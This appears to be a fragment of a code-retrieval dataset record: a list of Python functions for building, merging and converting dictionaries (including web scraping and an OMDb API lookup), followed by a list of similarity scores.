stemming(list_keys_final, stemmer)\n elif i == \"lematization\":\n print(\"lematization\")\n elif i == \"accents\":\n print(\"Normalizing accents...\")\n list_keys_final = strip_accents(list_keys_final)\n else:\n print(\"Preprocessing step not available\")\n reference_dict = dict(zip(list_keys_final,list_values))\n return reference_dict", "def string_factory(list_of_dicts):\n result = []\n for item in range(len(list_of_dicts)):\n result.append(template.format(**list_of_dicts[item]))\n return result", "def check_all_have_keys(dict_list, keys, name):\n if len(dict_list) == 0:\n return\n keys = set(keys)\n for dct in dict_list:\n if not keys.issubset(dct.keys()):\n raise DGLError('Expect all {} to include keys {}, but got {}.'.format(\n name, keys, dct.keys()))", "def setup_dict(data, required=None, defaults=None):\n required = required or []\n for i in set(required) - set(data):\n raise IndexError(\"Missed: %s\" % i)\n\n defaults = defaults or {}\n for i in set(data) - set(required) - set(defaults):\n raise ValueError(\"Unexpected: %s\" % i)\n\n defaults.update(data)\n return defaults", "def setup_dict(data, required=None, defaults=None):\n required = required or []\n for i in set(required) - set(data):\n raise IndexError(\"Missed: %s\" % i)\n\n defaults = defaults or {}\n for i in set(data) - set(required) - set(defaults):\n raise ValueError(\"Unexpected: %s\" % i)\n\n defaults.update(data)\n return defaults", "def setdefault(*dicts):\n param_complete = dict(dicts[0])\n for d in dicts[1:]:\n for k,v in d.items():\n param_complete.setdefault(k, v)\n\n return param_complete", "def combine_dict_in_json(dict_list, destination, json_name):\n new_dict = {}\n for k in dict_list[0].keys():\n new_dict[k] = tuple(new_dict[k] for new_dict in dict_list)\n\n with open(destination + '/' + json_name + '.json', 'w') as fp:\n json.dump(new_dict, fp, indent=1)", "def _try_set(set_list, index, nested_dict, dict_keys=[]):\n try:\n for dict_key in dict_keys:\n nested_dict = nested_dict.__getitem__(dict_key)\n set_list[index] = str(nested_dict)\n return nested_dict\n except:\n return ''", "def update_from_base(base_dict, updated_dict):\n tools_list = []\n updated_names = []\n base_tools = {}\n # load base tools list in dict\n for tool in base_dict['tools']:\n # print(f\"Tool name is {tool['name']}\")\n # Just alert of duplicated entries, but keep the last entry\n if 'tool_panel_section_label' in tool.keys():\n entry_key = tool['name'] + '_' + tool['tool_panel_section_label']\n else:\n entry_key = tool['name'] + '_' + tool['tool_panel_section_id']\n if entry_key in base_tools.keys():\n # print(entry_key)\n print(f'Duplicated entry key in base tool list: {entry_key}')\n base_tools[entry_key] = tool\n\n # iterate over the updated list\n for tool in updated_dict['tools']:\n new_entry = {}\n new_entry['name'] = tool['name']\n new_entry['owner'] = tool['owner']\n if 'tool_panel_section_label' in tool.keys():\n dict_key = tool['name'] + '_' + tool['tool_panel_section_label']\n else:\n dict_key = tool['name'] + '_' + tool['tool_panel_section_id']\n if dict_key in base_tools.keys():\n print(base_tools[dict_key],tool['revisions'])\n new_entry['revisions'] = update_revisions(dict_key, base_tools[dict_key],\n tool['revisions'])\n else:\n new_entry['revisions'] = [tool['revisions'][0]]\n\n # some tool entries dont define a tool_panel_section_label but a tool_panel_section_id\n # assert new_entry['tool_panel_section_label'] in section_labels_list\n if 'tool_panel_section_label' in tool.keys():\n 
new_entry['tool_panel_section_label'] = tool['tool_panel_section_label']\n else:\n if 'tool_panel_section_id' in tool.keys():\n new_entry['tool_panel_section_id'] = tool['tool_panel_section_id']\n else:\n sys.exit(f\"No panel definition for tool {tool['name']}\")\n\n # store the names of the udpated tools\n updated_names.append(new_entry['name'])\n\n tools_list.append(new_entry)\n\n for tool in base_dict['tools']:\n if tool['name'] not in updated_names:\n tools_list.append(tool)\n\n ret_dict = {\n 'install_repository_dependencies': True,\n 'install_resolver_dependencies': True,\n 'install_tool_dependencies': False,\n 'tools': tools_list\n }\n return ret_dict", "def create_lside(source_dict_list):\n\n lside_dict_list = []\n\n for source_dict in source_dict_list: # Iterando sobre a lista de dicionário original\n\n lside_dict = {} # Cria um novo dicionario para cada dicionário da lista original\n\n for chave in source_dict.keys(): # Iterando sobre as chaves do cionario atual\n\n if chave[0].isnumeric() == False: # So nos interessa as chaves não numericas\n lside_dict[chave] = source_dict[chave]\n\n lside_dict_list.append(lside_dict)\n\n return lside_dict_list", "def _parse() -> None:\n for obj in training_settings:\n if isinstance(obj, list):\n training_settings[obj] = [dict(value) for value in obj]", "def combine_dicts(dicts_list):\n\n # Combine all dictionarys keys into a single\n # list and find the unique set of them.\n all_keys = []\n for freq_dict in dicts_list:\n all_keys += list(freq_dict.keys())\n keys = set(all_keys)\n\n # Generate the new dictionary with all keys\n combined_dict = {key: 0 for key in keys}\n\n # Iterate over the list of keys so that\n # the memory access pattern to the combined_dict\n # avoids jumping around. If key is not found in\n # a given fdict, just pass over.\n for key in keys:\n for fdict in dicts_list:\n try:\n combined_dict[key] += fdict[key]\n except:\n pass\n\n return combined_dict", "def normalise_parameter(dict_of_dicts):\n new_inputs = []\n for key, inner_dict in dict_of_dicts.items():\n if not isinstance(inner_dict, dict):\n inner_dict = { 'type': inner_dict }\n inner_dict['id'] = key\n new_inputs.append(inner_dict)\n return new_inputs", "def _from_dicts(records, fieldnames=None):\n if fieldnames:\n fieldnames = list(fieldnames) # Needs to be a sequence.\n yield fieldnames # Header row.\n else:\n records = iter(records)\n first_record = next(records, None)\n if first_record:\n fieldnames = list(first_record.keys())\n yield fieldnames # Header row.\n yield list(first_record.values())\n\n for row in records:\n yield [row.get(key, None) for key in fieldnames]", "def __init__(self, proteins_dict):\n \n self.proteins_dict = proteins_dict\n self.proteins = list(proteins_dict.keys())", "def get_titles_and_links(list_of_urls, main_url):\n target = {url: {} for url in list_of_urls}\n for url in list_of_urls:\n content = urlopen(url).read()\n\n soup = BeautifulSoup(content, \"html.parser\")\n\n title = soup.title.string\n if title:\n target[url] = {'title': title}\n else:\n target[url] = {'title': 'No links here'}\n\n # I have to make list because .json file can't recognise sets and json.dump() doesn't work.\n\n links = list({urljoin(url, link.get('href')) for link in soup.find_all('a') if main_url in urljoin(url, link.get('href'))})\n\n if not links:\n target[url]['links'] = 'set()'\n else:\n target[url]['links'] = links\n\n return target", "def buildDict(self, dict):\n for word in dict:\n self.add(word)", "def affixes(etymologies):\n for affix in AFFIXES:\n 
name = FIRST(affix.groupindex.keys())\n print('building {} dictionary...'.format(name))\n dictionary = defaultdict(list)\n with ProgressBar(maxval=len(etymologies)) as progress:\n for i, key in enumerate(etymologies):\n for definition in etymologies[key]:\n if definition.has_key(name):\n dictionary[key].append(definition)\n progress.update(i)\n yield name, dictionary", "def add_dicts(*args):\n new = {}\n for arg in args:\n for key in arg:\n if key in new:\n raise ValueError(\"Duplicate key: %r\" % key)\n new[key] = arg[key]\n return new", "def setup():\n global definitions\n\n # fully replace dict with AttrDict\n complete = AttrDict({})\n for k, v in definitions.items():\n data = AttrDict({})\n data.create = v['create'] if 'create' in v else 'create_' + v['stem']\n data.fetch = v['fetch'] if 'fetch' in v else v['stem'] + 's'\n data.destroy = v['destroy'] if 'destroy' in v else 'delete'\n complete[k] = data\n definitions = complete\n\n global _existing\n for r in definitions.keys():\n _existing[r] = _fetch(r)", "def _from_dict(self, data=None):\n for key in self.shopkeys:\n setattr(self, key, getattr(data, key))", "def setUp(self):\n cwd = Path(__file__).parent.absolute()\n with open(f'{cwd}/test.json', 'r') as f:\n default = json.load(f)\n\n for data in default['results']:\n set_id = data.pop('set_id')\n products_data = data.pop('products')\n\n set_obj = Set.objects.create(id=set_id)\n\n spl_obj = set_obj.spls.create(**data)\n\n for product_data in products_data:\n product_data.pop('name')\n packages_data = product_data.pop('packages')\n if 'inactive_ingredients' in product_data:\n inactive_ingredients_data = product_data\\\n .pop('inactive_ingredients')\n\n inactive_ingredients_list = []\n for inactive_ingredient_data in inactive_ingredients_data:\n try:\n ingredient = InactiveIngredient.objects.get(\n **inactive_ingredient_data\n )\n inactive_ingredients_list.append(ingredient)\n except Exception:\n ingredient = InactiveIngredient.objects.create(\n **inactive_ingredient_data\n )\n inactive_ingredients_list.append(ingredient)\n\n product_obj = spl_obj.products.create(**product_data)\n product_obj.inactive_ingredients\\\n .add(*inactive_ingredients_list)\n\n for package_data in packages_data:\n product_obj.packages.create(**package_data)", "def _populate_attributes(self, obj, traverse_list=True):\n for key, value in obj.__dict__.items():\n if isinstance(value, dict):\n obj.__dict__[key] = self._reconstruct_object(value)\n elif isinstance(value, list):\n obj.__dict__[key] = [self._reconstruct_object(details) for details in value]\n if traverse_list:\n # Iterate through each season in the list of seasons\n for season in obj.__dict__[key]:\n self._populate_attributes(season, traverse_list=False)", "def additional_data_dict(titles: list) -> dict or str:\n try:\n additional_data = {}\n for title in titles:\n url = \"http://www.omdbapi.com/?i=tt3896198&apikey=6b513db6&t=\" + title\n headers = {\"Accept\": \"application/json\"}\n req = requests.get(url, headers=headers)\n api_content = json.loads(req.content.decode('utf-8'))\n # Because of no BoxOffice key in API for movie 'Ben Hur' (ID 68 in db):\n api_content.setdefault('BoxOffice', 'N/A')\n additional_data[title] = {}\n if api_content['imdbRating']:\n additional_data[title]['imdb_rating'] = float(api_content['imdbRating'])\n else:\n additional_data[title]['imdb_rating'] = -1\n if api_content['Runtime'] == 'N/A':\n additional_data[title]['runtime'] = -1\n else:\n additional_data[title]['runtime'] = int(re.sub(r'[^0-9]', '', 
api_content['Runtime']))\n if api_content['BoxOffice'] == 'N/A':\n additional_data[title]['box_office'] = -1\n else:\n additional_data[title]['box_office'] = int(re.sub(r'[^0-9]', '', api_content['BoxOffice']))\n nominations_oscars = re.search(r'Nominated for (.+?) Oscar', api_content['Awards'])\n if nominations_oscars:\n additional_data[title]['nominations_oscars'] = int(nominations_oscars.group(1))\n else:\n additional_data[title]['nominations_oscars'] = 0\n oscars = re.search(r'Won (.+?) Oscar', api_content['Awards'])\n if oscars:\n additional_data[title]['oscars'] = int(oscars.group(1))\n else:\n additional_data[title]['oscars'] = 0\n nominations_others = re.search(r'(\\d+) nomination', api_content['Awards'])\n if nominations_others:\n additional_data[title]['nominations_others'] = int(nominations_others.group(1))\n else:\n additional_data[title]['nominations_others'] = 0\n wins_others = re.search(r'(\\d+) win', api_content['Awards'])\n if wins_others:\n additional_data[title]['wins_others'] = int(wins_others.group(1))\n else:\n additional_data[title]['wins_others'] = 0\n return additional_data\n except KeyError:\n return \"No data about some movie(s). Check data source.\"\n except requests.exceptions.ConnectionError:\n return \"No access. Check internet connection or API is down.\"", "def make_dict(data_for_dict): \n \n column_name_list = data_for_dict[0]\n db_list = data_for_dict[1:]\n \n column_list1 = []\n column_list2 = []\n column_list3 = []\n column_list4 = []\n column_list5 = []\n column_list6 = []\n column_list7 = []\n column_list8 = []\n column_list9 = []\n column_list10 = []\n column_list11 = []\n hmdb_dict = {}\n for line in db_list:\n my_string1 = '' \n my_string2 = ''\n my_string3 = ''\n my_string4 = ''\n my_string5 = ''\n my_string6 = ''\n my_string7 = ''\n my_string8 = ''\n my_string9 = ''\n my_string10 = ''\n my_string11 = ''\n\n my_string1 = line[0]\n column_list1 += [my_string1]\n my_string2 += line[1]\n column_list2 += [my_string2]\n my_string3 += line[2]\n column_list3 += [my_string3]\n my_string4 += line[3]\n column_list4 += [my_string4]\n my_string5 += line[4]\n column_list5 += [my_string5]\n my_string6 += line[5]\n column_list6 += [my_string6]\n my_string7 += line[6]\n column_list7 += [my_string7]\n my_string8 += line[7]\n column_list8 += [my_string8]\n my_string9 += line[8]\n column_list9 += [my_string9]\n my_string10 += line[9]\n column_list10 += [my_string10]\n my_string11 += line[10]\n column_list11 += [my_string11] \n \n hmdb_dict[column_name_list[0]] = column_list1\n hmdb_dict[column_name_list[1]] = column_list2\n hmdb_dict[column_name_list[2]] = column_list3\n hmdb_dict[column_name_list[3]] = column_list4\n hmdb_dict[column_name_list[4]] = column_list5\n hmdb_dict[column_name_list[5]] = column_list6\n hmdb_dict[column_name_list[6]] = column_list7\n hmdb_dict[column_name_list[7]] = column_list8\n hmdb_dict[column_name_list[8]] = column_list9\n hmdb_dict[column_name_list[9]] = column_list10\n hmdb_dict[column_name_list[10]] = column_list11\n \n return (hmdb_dict)", "def _dict_keys(typingctx, d):\n resty = types.DictKeysIterableType(d)\n sig = resty(d)\n codegen = _iterator_codegen(resty)\n return sig, codegen", "def _init_dict(self):\n dict_ord = self.MIN_VALID\n\n for da in self.train_das:\n for dai in da:\n if dai.name not in self.dict_slot:\n self.dict_slot[dai.name] = dict_ord\n dict_ord += 1\n if dai.value not in self.dict_value:\n self.dict_value[dai.value] = dict_ord\n dict_ord += 1\n\n for tree in self.train_trees:\n for t_lemma, formeme in 
tree.nodes:\n if t_lemma not in self.dict_t_lemma:\n self.dict_t_lemma[t_lemma] = dict_ord\n dict_ord += 1\n if formeme not in self.dict_formeme:\n self.dict_formeme[formeme] = dict_ord\n dict_ord += 1\n\n self.dict_size = dict_ord", "def fill_dict(lineage_data_dict, i, barcode_list):\n # base case\n if i == 5:\n for barcode in barcode_list:\n lineage_data_dict['barcode'].append(barcode)\n return lineage_data_dict\n\n # iterative case\n else:\n barcode_allocation_list = [[] for istate in range(3)]\n for barcode in barcode_list:\n # assign barcodes based on their states and put them into the list\n barcode_allocation_list[barcode['assigned_state'][i]].append(barcode)\n # add these barcodes to the node\n lineage_data_dict['t{}'.format(i)]['barcode'].append(barcode)\n\n # continue to call function for the next timepoint using recursion\n for index, state in enumerate(states):\n lineage_data_dict['t{}'.format(i)][state] = fill_dict(lineage_data_dict['t{}'.format(i)][state], i + 1,\n barcode_allocation_list[index])\n return lineage_data_dict", "def initoptionsdict(cls):\n for i in range(len(clslist)):\n optionsdict.update(dict({clslist[i]: dict({'OPTIONS': dict()})}))", "def setKeys():\n keywords['c++'] = {}\n with open('cppkeywords.txt', 'r') as f:\n for i in f:\n i = i.strip('\\n')\n words = map(str, i.split())\n key = words[0]\n words.pop(0)\n keywords['c++'][key] = list(words)\n for j in words:\n MyDict.insert(j)\n keywords['py'] = {}\n with open('pykeywords.txt', 'r') as f:\n for i in f:\n i = i.strip('\\n')\n words = map(str, i.split())\n key = words[0]\n words.pop(0)\n keywords['py'][key] = list(words)\n for j in words:\n MyDict.insert(j)", "def main_dictionary():\n for lyric in lyrics:\n for line in lyric.split(\"\\n\"):\n dictionary(line.split(\" \"))", "def pre_process_raw(raw: dict) -> dict:\n api_data = raw.get(\"data\", {}).get(\"apiList\", [])\n return {api[\"id\"]: api for api in api_data}", "def convert_list_by_key(\n original_list, key_map, fill_in=False, whitelist=[], blacklist=[]\n): # pylint: disable=dangerous-default-value\n converted_list = []\n for original in list(original_list):\n converted_list.append(\n convert_dict_by_key(original, key_map, fill_in=fill_in, whitelist=whitelist, blacklist=blacklist)\n )\n\n return converted_list", "def organize_results(result_dicts_list, config_fn):\n\n metric_id = config_fn.get_metric_fn_id()[1]\n organized_results = []\n for results_list in result_dicts_list:\n for result_dict in results_list:\n dict_ = {}\n for key, value in result_dict.items():\n dict_[key] = value\n organized_results.append(dict_)\n pass\n\n return organized_results" ]
[ "0.5770778", "0.5673443", "0.5617882", "0.5580341", "0.55801505", "0.5575327", "0.5571679", "0.55587304", "0.5528891", "0.5508562", "0.55064344", "0.5500273", "0.5479882", "0.5471181", "0.5468983", "0.546297", "0.54368216", "0.54329467", "0.5403189", "0.5389576", "0.5385095", "0.5378219", "0.5373672", "0.5370488", "0.5361372", "0.5358726", "0.5351396", "0.532728", "0.5318948", "0.5303318", "0.5294323", "0.52893794", "0.5276036", "0.52743155", "0.52524006", "0.5251311", "0.52474874", "0.52467895", "0.52443683", "0.5240685", "0.52240723", "0.52064145", "0.51972604", "0.5179249", "0.51788646", "0.51752657", "0.516531", "0.51608974", "0.5156805", "0.51469713", "0.51386017", "0.5124779", "0.5106023", "0.51059556", "0.50979054", "0.5086443", "0.50828093", "0.5081", "0.50789464", "0.5075126", "0.5073012", "0.507081", "0.50697875", "0.50668603", "0.5058342", "0.5054118", "0.5046318", "0.50416446", "0.50416094", "0.50387895", "0.5024253", "0.5024253", "0.5022959", "0.5019978", "0.5019158", "0.5016597", "0.5016447", "0.5013971", "0.50128764", "0.5003668", "0.5002569", "0.4999573", "0.49981037", "0.49954066", "0.49872577", "0.49841636", "0.49836805", "0.49809417", "0.49794337", "0.4978328", "0.4978088", "0.4974214", "0.49692562", "0.49552864", "0.49528095", "0.4951847", "0.49505663", "0.49504843", "0.49498627", "0.49403754", "0.4935286" ]
0.0
-1
Fields that are expanded (typically the tax lot id) also need to be normalized to remove characters that prevent easy matching. This method will remove unwanted characters from the jurisdiction tax lot id. Here are some examples of what actual city taxlots can look like: 13153123902 069180102923 14A612 123.4123 PANL1593005 0.000099 00012312 12123121212134567 12 0123 TT0612
def _normalize_expanded_field(value):
    value = value.strip()
    value = re.sub(r'\s{2,}', ' ', value)
    value = re.sub(r'/{2,}', '/', value)
    value = re.sub(r'\\{2,}', '\\\\', value)
    value = re.sub(r'-{2,}', '-', value)
    value = re.sub(r'\*{2,}', '*', value)
    value = re.sub(r'\.{2,}', '.', value)
    value = value.upper()
    return value
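For illustration, a minimal, self-contained sketch of how this normalization behaves. The `import re` line and the standalone test loop are additions for the example only; the first three inputs are drawn from the taxlot examples listed in the query above, and the last one is a hypothetical dirty value used to show the separator collapsing.

import re

def _normalize_expanded_field(value):
    # Trim surrounding whitespace, collapse repeated separators, uppercase.
    value = value.strip()
    value = re.sub(r'\s{2,}', ' ', value)
    value = re.sub(r'/{2,}', '/', value)
    value = re.sub(r'\\{2,}', '\\\\', value)
    value = re.sub(r'-{2,}', '-', value)
    value = re.sub(r'\*{2,}', '*', value)
    value = re.sub(r'\.{2,}', '.', value)
    value = value.upper()
    return value

# Example inputs: three taxlot strings from the query, plus one hypothetical dirty value.
for raw in ["  panl1593005 ", "069180102923", "14a612", "123..4123 // a"]:
    print(repr(raw), "->", repr(_normalize_expanded_field(raw)))
    # '  panl1593005 '  -> 'PANL1593005'
    # '069180102923'    -> '069180102923'
    # '14a612'          -> '14A612'
    # '123..4123 // a'  -> '123.4123 / A'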
{ "objective": { "self": [], "paired": [], "triplet": [ [ "query", "document", "negatives" ] ] } }
[ "def tidy_telephone(telephone):\n junk = ['none', 'none1', 'na', 'n/a', 'same', 'yes', 'cell', 'offsite']\n telephone = telephone.replace('xxx-xxx-xxxx', '')\n telephone = telephone.replace('ext', ' x')\n telephone = telephone.replace(' cell', '')\n telephone = telephone.replace('\"', '')\n telephone = telephone.replace('%', '')\n if telephone in junk:\n return ''\n else:\n return telephone", "def scrub_gene_id(the_id):\n the_id = re.sub(r'(.*)\\.([0-9]{1,2})$', r'\\1_AT\\2', the_id)\n the_id = re.sub(r'\\W', r'_', the_id)\n return the_id", "def _clean_id(self, dirty_id):\n return self.wsid_regex.sub(\"\", dirty_id.replace(\" \", \"_\"))", "def minimalTextCleaning(row, field):\n\n # force encoding\n encoded_text = row[field].encode(encoding = 'ascii',errors = 'replace')\n decoded_text = encoded_text.decode(encoding='ascii',errors='strict')\n remove_funky_chars = str(decoded_text).replace(\"?\", \" \")\n lower_case = str(remove_funky_chars).lower().strip()\n\n # strip redundant whitespace\n cleaned_text = re.sub(' +', ' ', lower_case)\n\n\n # strip signature lines\n cleaned_text = cleaned_text.replace(\"_\", \"\")\n\n return cleaned_text", "def normalize(phone):\n d = re.sub('\\D', '', phone)\n return '+7 (%s) %s-%s-%s' % (d[1:4], d[4:7], d[7:9], d[9:11])", "def strip(phone):\n return re.sub('\\D', '', Phone.normalize(phone))", "def clean_fields(self, *args, **kwargs):\n if self.ipi_name:\n self.ipi_name = self.ipi_name.zfill(11)\n if self.ipi_base:\n self.ipi_base = self.ipi_base.replace(\".\", \"\").upper()\n self.ipi_base = re.sub(\n r\"(I).?(\\d{9}).?(\\d)\", r\"\\1-\\2-\\3\", self.ipi_base\n )\n return super().clean_fields(*args, **kwargs)", "def clean_phone(self):\n data = self.cleaned_data['phone']\n data = data.strip(' +').replace('-', '')\n if len(data) == 12:\n data = data[3:]\n\n return data", "def sanitize_id (self, id):\n return re.sub (self.sanitize_pat, '', id)", "def cleanSents(row, field):\n\n text = str(row[field]).lower()\n clean_text = re.sub('[^A-Za-z0-9]+', ' ', text).strip()\n return clean_text", "def clean_as_smiles(self):\n regexp = r\"^([^J][0-9BCOHNSOPIFKcons@+\\-\\[\\]\\(\\)\\\\\\/%=#$,.~&!|Si|Se|Br|Mg|Na|Cl|Al]{3,})$\"\n found = re.search(regexp, self.dirty)\n if found is None:\n self.cleaned = \"\"\n else:\n self.cleaned = found[0]", "def clean_number_plate(self, vrn):\n cleaned = re.sub(r'[^\\dA-Z]', '', vrn)\n\n if re.match(r'^[A-Z]{2}', cleaned) and len(cleaned) == 7:\n if cleaned[2] == 'O':\n cleaned = cleaned[:2] + '0' + cleaned[3:]\n if cleaned[2] == 'I':\n cleaned = cleaned[:2] + '1' + cleaned[3:]\n if cleaned[3] == 'O':\n cleaned = cleaned[:3] + '0' + cleaned[4:]\n if cleaned[3] == 'I':\n cleaned = cleaned[:3] + '1' + cleaned[4:]\n\n if re.match(r'^B', cleaned) and len(cleaned) == 7:\n if cleaned[1] == 'O':\n cleaned = cleaned[:1] + '0' + cleaned[2:]\n if cleaned[1] == 'I':\n cleaned = cleaned[:1] + '1' + cleaned[2:]\n if cleaned[2] == 'O':\n cleaned = cleaned[:2] + '0' + cleaned[3:]\n if cleaned[2] == 'I':\n cleaned = cleaned[:2] + '1' + cleaned[3:]\n if cleaned[3] == 'O':\n cleaned = cleaned[:3] + '0' + cleaned[4:]\n if cleaned[3] == 'I':\n cleaned = cleaned[:3] + '1' + cleaned[4:]\n\n if re.match(r'^[A-Z]{2}', cleaned) and len(cleaned) == 8:\n if cleaned[0] == 'Y':\n cleaned = 'V' + cleaned[1:]\n if cleaned[1] == 'Y':\n cleaned = cleaned[0] + 'V' + cleaned[2:]\n\n return cleaned", "def clean_num(quote):\n for char in ROMAN:\n quote = quote.replace(*char)\n return quote", "def _remove_area_code(phone):\n\n if not phone.startswith('+46'):\n return 
phone\n else:\n return '0' + phone[3:]", "def clean_as_inchikey(self):\n regexp = r\"[A-Z]{14}-[A-Z]{10}-[A-Z]\"\n found = re.search(regexp, self.dirty)\n if found is None:\n self.cleaned = \"\"\n else:\n self.cleaned = found[0]", "def clean_specific_name(x: str) -> str:\n\n # this is a list of terms that are not actual species names or specific names that have never been part of\n # a fiddler genus\n skip_list = (\"sp.\",\n \"spp.\",\n \"var.\",\n \"nov.\",\n \"a\",\n \"ete\",\n \"panema\",\n \"pagurus\",\n \"quadratus\",\n \"albidus\",\n \"vociferans\",\n \"raniformis\",\n \"nigra\",\n \"albicans\",\n \"arenarius\",\n \"raninus\",\n \"serratus\",\n \"cordimana\",\n \"spec.\",\n \"complex\",\n \"5\",\n \"6\",\n \"1\",\n \"afruca\",\n \"gelasimus\")\n\n if (\" \" not in x) or (\"(\" in x):\n return \"\"\n else:\n if \"{\" in x:\n x = x[:x.find(\"{\")-1]\n y = x.split(\" \")\n x = y[len(y)-1].lower()\n if (x in skip_list) or (\"gruppe\" in x) or (\"group\" in x) or (\"complex\" in x):\n return \"\"\n else:\n return x.lower()", "def normalise_tag_id(input_id):\n return input_id.replace(\" \", \"\").replace(\"\\n\", \"\").replace(\"\\r\", \"\")", "def clean_phone(number):\n numberlist = re.findall(\"\\d\",number)\n new_number = \"\".join(numberlist)\n if len(new_number) == 8:\n \tnew_number = \"010\" + new_number\n\tnew_number = new_number[-11:]\n\tif new_number.startswith('1'):\n\t\tnew_number = \"+86-\" + new_number\n\telse:\n\t\tnew_number = \"+86-10-\" + new_number[-8:]\n\treturn new_number", "def clean_phone(self):\n phone = self.cleaned_data['phone']\n if phone.startswith('8') and len(phone) > 7:\n return phone.replace('8', '+7', 1)\n\n return phone", "def _canonify(self, rut):\n rut = smart_unicode(rut).replace(' ', '').replace('.', '').replace('-', '')\n return rut[:-1], rut[-1]", "def sanitaze(field):\n return re.sub('[^0-9a-zA-Z]+', '-', str(field))", "def cleaning (data):", "def clean_street(self):\n street = self.cleaned_data['street'].strip().title()\n street = re.sub(r'\\bRoad\\b', 'Rd', street)\n street = re.sub(r'\\bStreet\\b', 'Str', street)\n street = re.sub(r'\\bAvenue\\b', 'Ave', street)\n street = re.sub(r'\\bParkway\\b', 'Pkwy', street)\n street = re.sub(r'\\bSuite\\b', 'Ste', street)\n street = re.sub(r'\\bApartment\\b', 'Apt', street)\n street = re.sub(r'\\s+', ' ', street) # Remove runs of spaces\n return street", "def clean_unnecessary_characters(self, tweet):\n tweet = tweet.lstrip(\"\\\"\").rstrip(\"\\\"\")\n tweet = re.sub(self.compiledAlphanumericRegex, ' ', tweet)\n tweet = tweet.replace('_', ' ')\n return tweet", "def remove_numbers_fun(self):\n self.doc = re.sub(\"[0-9]\", \"\", self.doc)", "def normalize_orcid(val):\n for orcid_url in orcid_urls:\n if val.startswith(orcid_url):\n val = val[len(orcid_url) :]\n break\n val = val.replace(\"-\", \"\").replace(\" \", \"\")\n\n return \"-\".join([val[0:4], val[4:8], val[8:12], val[12:16]])", "def remove_phone(body):\r\n phone = re.compile('[0-9]{7}|[0-9]{3}[\\- ][0-9]{3}[\\- ][0-9]{4}|[0-9]{10}|\\([0-9]{3}\\)[\\- ][0-9]{3}[\\- ][0-9]{4}')\r\n body = re.sub(phone, 'phone', body)\r\n return body", "def clean_rent(self, rent):\n # assume rent is either int/float or str\n if isinstance(rent, str):\n return int(rent.replace('$', '').replace(',', ''))\n else:\n return rent", "def clean_weather(weather):\n\n weather.replace(\"M\", float(\"NaN\"), inplace=True)\n weather.replace(\"-\", float(\"NaN\"), inplace=True)\n weather.replace(\"T\", float(\"NaN\"), inplace=True)\n weather.replace(\" T\", float(\"NaN\"), 
inplace=True)\n weather.replace(\" T\", float(\"NaN\"), inplace=True)\n weather.drop(\"CodeSum\", axis=1, inplace=True)\n\n return merge_weather(weather)", "def _sanitize_to_identifer(name):\n n = name.strip()\n n = re.sub('/', ' ', n)\n n = re.sub('-', ' ', n)\n n = re.sub(' +', '_', n)\n n = re.sub('[\\W]+', '', n)\n return n", "def cleanup_input(data):\n data = re.sub(r'[^0-9A-Za-z ()_,.-:]', '', data)\n return data", "def normalise_key(self, key):\n key = key.replace('-', '_')\n if key.startswith(\"noy_\"):\n key = key[4:]\n return key", "def clean_term(term, site='', siteWordCount=None, dataType=''): # dtype\n if pd.isna(term): \n print(\"(clean_term) Input term is NaN: {}\".format(term))\n return ''\n if not isinstance(term, str): \n return str(term)\n\n insigWords = LoincTable.stop_words # [\"IN\", \"FROM\", \"ON\", \"OR\", \"OF\", \"BY\", \"AND\", \"&\", \"TO\", \"BY\", \"\", \" \"]\n \n modTerm = (term.replace(\"'\", \"\").replace(\",\", \" \").replace(\".\", \" \") \\\n .replace(\":\", \" \").replace('\\t', \" \").replace(\"^\", \" \").replace(\"+\", \" \")\\\n .replace(\"*\", \" \").replace(\"~\", \" \").replace(\"(\", \" \").replace(\")\", \" \")\\\n .replace(\"!\", \" \").replace(\"[\", \" \").replace(\"]\", \" \").replace(\"{\", \" \").replace(\"}\", \" \")\\\n .replace(\"_\", \" \").replace(\"|\", \" \").replace('\"', \" \").split(\" \"))\n\n #############################################################################\n i = 0\n while i < len(modTerm):\n modTerm[i] = re.sub(r\"\\d{1,2}[\\/-]\\d{1,4}([\\/-]\\d{2,4})*|\\d{6}\", \"\", modTerm[i])\n if modTerm[i] != None and len(modTerm[i]) > 0:\n i = i + 1\n else:\n modTerm.remove(modTerm[i])\n #############################################################################\n\n # remove repeated tokens \n modTerm = sorted(set(modTerm), key=modTerm.index)\n\n j = 0\n nameSplit = list()\n while j < len(modTerm):\n splits = modTerm[j].replace(\"/\", \" \").replace(\"\\\\\", \" \").replace(\"-\", \" \").split(\" \")\n k = 0\n while ((k < len(splits)) and (len(splits[k]) > 0) and (splits[k] not in insigWords)):\n newWord = splits[k].strip()\n nameSplit.append(newWord)\n\n if len(site) > 0 and isinstance(siteWordCount, dict): \n siteWordCount[site][newWord] += 1\n k = k + 1\n j = j + 1\n\n return \" \".join(nameSplit)", "def clean_as_inchi(self):\n regexp = r\"(1S\\/|1\\/)[0-9, A-Z, a-z,\\.]{2,}\\/(c|h)[0-9].*$\"\n found = re.search(regexp, self.dirty)\n if found is None:\n self.cleaned = \"\"\n else:\n self.cleaned = \"InChI=\" + found[0].replace('\"', \"\")", "def preprocess_libcom(libcom):\n return tools.normalize_string(re.sub(r'[0-9]+', '', libcom))", "def clean_sunetid1(self):\n return self.instance.sunetid1", "def remove_flight_numbers(text):\n return ' '.join(word for word in text.split() if not any(char.isdigit() for char in word))", "def clean_numbers(self, x):\n\n # remove \"th\" after a number\n matches = re.findall(r'\\b\\d+\\s*th\\b', x)\n if len(matches) != 0:\n x = re.sub(r'\\s*th\\b', \" \", x)\n\n # remove \"rd\" after a number\n matches = re.findall(r'\\b\\d+\\s*rd\\b', x)\n if len(matches) != 0:\n x = re.sub(r'\\s*rd\\b', \" \", x)\n\n # remove \"st\" after a number\n matches = re.findall(r'\\b\\d+\\s*st\\b', x)\n if len(matches) != 0:\n x = re.sub(r'\\s*st\\b', \" \", x)\n\n # remove \"nd\" after a number\n matches = re.findall(r'\\b\\d+\\s*nd\\b', x)\n if len(matches) != 0:\n x = re.sub(r'\\s*nd\\b', \" \", x)\n\n # replace standalone numbers higher than 10 by #\n # this function does not touch numbers linked to 
